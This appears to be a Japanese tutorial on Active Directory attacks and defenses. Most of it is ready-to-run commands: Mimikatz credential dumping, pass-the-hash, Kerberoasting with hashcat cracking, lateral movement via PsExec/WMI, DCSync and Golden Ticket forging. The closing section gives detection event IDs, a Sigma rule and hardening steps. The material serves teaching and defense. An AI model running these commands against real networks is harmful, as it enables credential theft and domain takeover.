通常の認証フロー: ユーザー → [パスワード入力] → NTLMハッシュ生成 → DC/サーバーへ送信

Pass-the-Hash: 攻撃者 → [ハッシュ窃取] → ハッシュをそのまま送信 → 認証成功

Mimikatz を使ったメモリからのハッシュダンプ（管理者権限が必要）

mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords

出力例

Authentication Id : 0 ; 123456 (00000000:0001e240)

Session : Interactive from 1

User Name : Administrator

Domain : CORP

Logon Server : DC01

NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Impacket の psexec.py を利用した PtH 攻撃

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
CORP/Administrator@192.168.1.10

CrackMapExec による複数ホストへの展開確認

crackmapexec smb 192.168.1.0/24
-u Administrator
-H 8846f7eaee8fb117ad06bdd830b7586c
—shares

Kerberoasting の手順:

1. ドメインユーザーとして認証（低権限でも可）
2. SPN が登録されたサービスアカウント一覧を取得
3. そのサービスへの TGS（サービスチケット）をリクエスト
4. TGS はサービスアカウントのハッシュで暗号化されているため持ち出せる
5. オフラインでブルートフォース・辞書攻撃でパスワードを解読
6. 解読したパスワードでサービスアカウントに認証

GetUserSPNs.py（Impacket）でSPNを持つアカウントを列挙しチケットを取得

python3 GetUserSPNs.py CORP.local/john:Password123 -dc-ip 192.168.1.1 -request

出力例

ServicePrincipalName Name MemberOf PasswordLastSet

---------------------------- ---------- ---------------- -------------------

MSSQLSvc/SQLSRV01.corp.local svc_mssql Domain Users 2024-01-15 10:30:00

$krb5tgs$23$svc_mssql$CORP.LOCAL$MSSQLSvc/SQLSRV01.corp.local$a1b2c3d4…

Hashcat でオフライン解読（RC4-HMAC 形式）

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
—force -O

Sysinternals PSExec（管理共有を利用）

psexec.exe \192.168.1.20 -u CORP\Administrator -p Password123 cmd.exe

Impacket 版（Linux から実行可能）

python3 psexec.py CORP/Administrator:Password123@192.168.1.20

smbexec.py（ファイルを書き込まないため検出を回避しやすい）

python3 smbexec.py CORP/Administrator:Password123@192.168.1.20

PowerShell からの WMI リモートコマンド実行

$cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create
-ArgumentList “cmd.exe /c whoami > C:\output.txt”
-ComputerName 192.168.1.20
-Credential $cred

Impacket wmiexec.py

python3 wmiexec.py CORP/Administrator:Password123@192.168.1.20

CrackMapExec で WMI 経由の実行

crackmapexec smb 192.168.1.20 -u Administrator -p Password123 -x “whoami”

Mimikatz による DCSync（Domain Admin 権限が必要）

mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

全ドメインユーザーのハッシュを一括取得

mimikatz # lsadump::dcsync /domain:corp.local /all /csv

Impacket secretsdump.py

python3 secretsdump.py CORP/Administrator:Password123@dc01.corp.local

まず KRBTGT ハッシュを取得（DCSync or NTDS.dit ダンプ）

KRBTGT Hash: 1234567890abcdef1234567890abcdef

Domain SID: S-1-5-21-1234567890-1234567890-1234567890

Mimikatz で Golden Ticket 作成

mimikatz # kerberos::golden
/user:FakeAdmin
/domain:corp.local
/sid:S-1-5-21-1234567890-1234567890-1234567890
/krbtgt:1234567890abcdef1234567890abcdef
/ticket:golden.kirbi

チケットを使ってドメインコントローラーにアクセス

mimikatz # kerberos::ptt golden.kirbi dir \DC01\C$

【Pass-the-Hash 検出】

• イベントID 4624: ログオン成功（ログオンタイプ 3 = ネットワーク）
• イベントID 4625: ログオン失敗（多数の失敗 → ブルートフォースの可能性）
• NTLM 認証のログオンで NTLMv1 使用は要警戒

【Kerberoasting 検出】

• イベントID 4769: Kerberos サービスチケット操作
  • 暗号タイプ 0x17（RC4-HMAC）での TGS リクエスト
  • 短時間での大量リクエスト

【横移動全般】

• イベントID 4648: 明示的な資格情報でのログオン試行
• イベントID 7045: 新しいサービスのインストール（PSExec の痕跡）
• Sysmon ID 3: ネットワーク接続（内部から内部への SMB/WMI 接続）

title: Kerberoasting Activity Detection status: stable logsource: product: windows service: security detection: selection: EventID: 4769 TicketEncryptionType: ‘0x17’ ServiceName|endswith: ’$’ filter: ServiceName: ‘krbtgt’ condition: selection and not filter falsepositives:

• Legacy applications requiring RC4 level: high

Protected Users グループに特権アカウントを追加（Kerberoasting・PtH 対策）

Add-ADGroupMember -Identity “Protected Users” -Members “Administrator”,“svc_critical”

サービスアカウントの AES256 強制（Kerberoasting 対策）

Set-ADUser svc_mssql -KerberosEncryptionType AES256

KRBTGT パスワードの定期リセット（180日ごと推奨）

Reset-KrbtgtKeyInteractive.ps1 などのスクリプトを使用

SMB 署名の強制（PtH の一部手法を防止）

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force